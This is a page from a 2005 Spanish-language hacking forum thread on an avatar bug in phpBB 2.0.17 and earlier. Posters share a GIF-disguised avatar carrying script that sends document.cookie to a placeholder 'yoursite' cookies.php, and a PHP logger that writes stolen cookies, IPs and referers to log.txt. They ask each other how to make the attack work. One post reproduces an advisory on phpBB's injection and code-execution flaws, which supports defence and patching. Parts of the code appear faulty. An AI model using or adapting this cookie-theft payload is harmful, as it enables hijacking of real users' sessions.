elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Nuevo bug en los phpbb<=2.0.17
0 Usuarios y 3 Visitantes están viendo este tema.
Páginas: 1 [2] 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: Nuevo bug en los phpbb<=2.0.17  (Leído 19,623 veces)
Joker_dxz


Desconectado Desconectado

Mensajes: 315


The imposible is nothing


Ver Perfil WWW
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #10 en: 4 Noviembre 2005, 22:26 pm »

yo tampoco lo entendi mucho :-\

aber primero se crea con el phpedit un archivo con el codigo.

luego que hago con esto:

Citar
<GIF89aŸ8÷™fÿ™™><html><head><script>alert('http://yoursite/cookies.php?c='+document.cookie);</script></head></html>

lo inserto en el archivo config.php por algun lao??
En línea


sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #11 en: 4 Noviembre 2005, 23:02 pm »

esto mas que vulnerabilidad de phpBB es vulnerabilidad de internet explorer.. que aunque phpBB tiene la culpa por no fijarse si es una imagen.. internet explorer es el que permite ejecutar el codigo... que aunque no lo ejecuta activamente lo ejecuta pasivamente, yo no me habia fijado en este detalle, y pensaba que no funcionaba este mendigo bug.. pero al parecer si hace el intento que es mas que suficiente.
En línea

korgzak

Desconectado Desconectado

Mensajes: 171


Aqui no se le va a pegar a nadie...


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #12 en: 6 Noviembre 2005, 11:46 am »

PHPBB + Internet Explorer = Catastrofe ;D ;D ;D
En línea

dxr
Colaborador
***
Desconectado Desconectado

Mensajes: 3.036



Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #13 en: 6 Noviembre 2005, 13:01 pm »

Esta muy bien mousehack ;).
En línea

Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara.
Joker_dxz


Desconectado Desconectado

Mensajes: 315


The imposible is nothing


Ver Perfil WWW
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #14 en: 6 Noviembre 2005, 13:17 pm »

PHPBB + Internet Explorer = Catastrofe ;D ;D ;D

PHPBB + Internet Explorer + windows + norton =  :o :o :o :o :o
En línea


Ipargorri

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #15 en: 6 Noviembre 2005, 20:08 pm »

si como se comenta antes es mas una vulnerabilidad de i.explorer
con firefox funcionaria tambien?
En línea

Dinio_Albino

Desconectado Desconectado

Mensajes: 25


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #16 en: 6 Noviembre 2005, 22:48 pm »

He creado un foro en phpBB con version por debajo de 2.0.17 y he subido el archivo cookie.php y después subí el avatar y despues visito un post del otro susuario, pero no me crea ningún log.txt, todo esto con internet explorer.

¿por qué no funciona?
En línea



0000000000000

Desconectado Desconectado

Mensajes: 9



Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #17 en: 7 Noviembre 2005, 14:35 pm »

---------------------------
PARA LOS INDIOS
---------------------------
===============

phpBB: Ejecución de código arbitrario / SQL injection / Evasión de protección
Se han descubierto vulnerabilidades en phpBB (utilizado para definir y administrar foros de discusión, noticias, etc.), las cuales podrían ser explotadas por un atacante para ejecutar código HTML y PHP arbitrario o efectuar “SQL injection” en un sistema vulnerable.

Resumen
Errores de inicialización de variables podrían ser explotados por un atacante para ejecutar código HTML y PHP arbitrario o efectuar “SQL injection” en un sistema vulnerable.

Versiones Afectada

Estas vulnerabilidades afectan a las versiones de phpBB 2.0.17 y anteriores.

Detalle
1) Errores en la inicialización de variables:
- La variable “error_msg” en la función “usercp_register.php” no es inicializada correctamente, lo cual puede ser utilizado para inyectar código HTML arbitrario.
- La variable “forward_page” en la función “login.php” no es inicializada correctamente, lo cual puede ser utilizado para inyectar código HTML arbitrario.
- La variable “list_cat” en la función “search.php” no es inicializada correctamente, lo cual puede ser utilizado para inyectar código HTML arbitrario.
- La variable “signature_bbcode_uid” en la función “usercp_register.php” no es inicializada correctamente, lo cual puede ser utilizado para efectuar “SQL injection” de sentencias “field=xxx” en queries que operan en tablas de usuario, cuando la opción “magic_quotes_gpc” se encuentra habilitada.
- La variable “signature_bbcode_uid” en la función “usercp_register.php” puede ser utilizada además para inyectar, por ejemplo, el modificador “e” en el primer parámetro de una sentencia “preg_replace()”, lo cual implica que el segundo parámetro será evaluado como código PHP. Como el segundo parámetro es completado enteramente con la firma provista por el usuario, es posible ejecutar cualquier código PHP. Esto puede ser explotado independientemente del seteo de la opción “magic_quotes_gpc”.

2) Vulnerabilidades de evasión:
- En PHP5 (5.0.5 o anteriores) es posible registrar, por ejemplo, la variable global “$foobar” proporcionando una variable GET/POST/COOKIE con el nombre “foobar” pero también proporcionando una variable GPC llamada “GLOBALS[foobar]”. Si la variable es proporcionada de dicha forma, el código previo no tratará de dessetear “foobar” sino $GLOBALS, lo cual evade completamente la protección.
- Cuando la extensión de la sesión no es iniciada por un llamado a “session_start()”, PHP desconoce las variables $_SESSION o $HTTP_SESSION_VARS, lo cual significa que es posible llenarlas con cualquier valor, si “register_globals se encuentra habilitado. Combinado con el hecho que “array_merge()” no funcionará en PHP5, cuando al menos uno de los parámetros no es un arreglo, es posible que un atacante setee HTTP_SESSION_VARS a una cadena, evadiendo toda la protección, ya que “$input” termina vacía.
- Cuando “register_long_array” se encuentra deshabilitada, PHP no desconoce las variables HTTP_*. Esto implica que pueden ser completadas con cualquier contenido, aún no relacionado con las variables globales existentes. En este caso la protección no funciona.

Impacto
El impacto de estas vulnerabilidades es ALTO.

Recomendaciones

Recomendamos actualizar phpBB a la versión 2.0.18:

http://www.phpbb.com/downloads.php

Referencias
Para más información sobre este boletín:

Aviso original:
http://www.hardened-php.net/advisory_172005.75.html

Secunia:
http://secunia.com/advisories/17366/

phpBB:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=336756
En línea

fackie

Desconectado Desconectado

Mensajes: 10



Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #18 en: 7 Noviembre 2005, 16:00 pm »

por ejemplo hagamos algo asi para realizar un robo de cookie...

creamos un archivo llamado cookie.php con el siguiente codigo:

Código:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt'); // chmod 777 and same directory
fwrite($fp, '<br>Cookie: '.$cookie.'</br> IP: ' .$ip. '<br> Date and Time: ' .$date. '</br> Referer: '.$referer.' ');
fclose($fp);
?>

este codigo creara un archivo log.txt con permiso 777

ahora creamos un avatar para subir a la web vulnerable con el siguiente codigo:

Código:
<GIF89aŸ8÷™fÿ™™><html><head><script>alert('http://yoursite/cookies.php?c='+document.cookie);</script></head></html>

y lo guardamos, recordando ponerle la extension .GIF

Salu2


como as contruido ese codigo?
podrias explicar como hacerlo plz ^^
« Última modificación: 7 Noviembre 2005, 16:02 pm por fackie » En línea

manware

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #19 en: 8 Noviembre 2005, 01:41 am »

Citar
<GIF89aŸ8÷™fÿ™™>


Alguien podria dar la cadena hexadecimal correcta?...

Cuando subo la imagen a un 2.0.17  me tira este error de validación:

"El avatar debe tener menos de 80 pixels de ancho por 80 pixels de alto"

Supongo que no esta entendiendo bien la cabecera del Gif.

Gracias.
En línea

Páginas: 1 [2] 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Error en phpBB - Ayuda
Desarrollo Web
victorius 0 2,301 Último mensaje 28 Noviembre 2020, 18:18 pm
por victorius
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines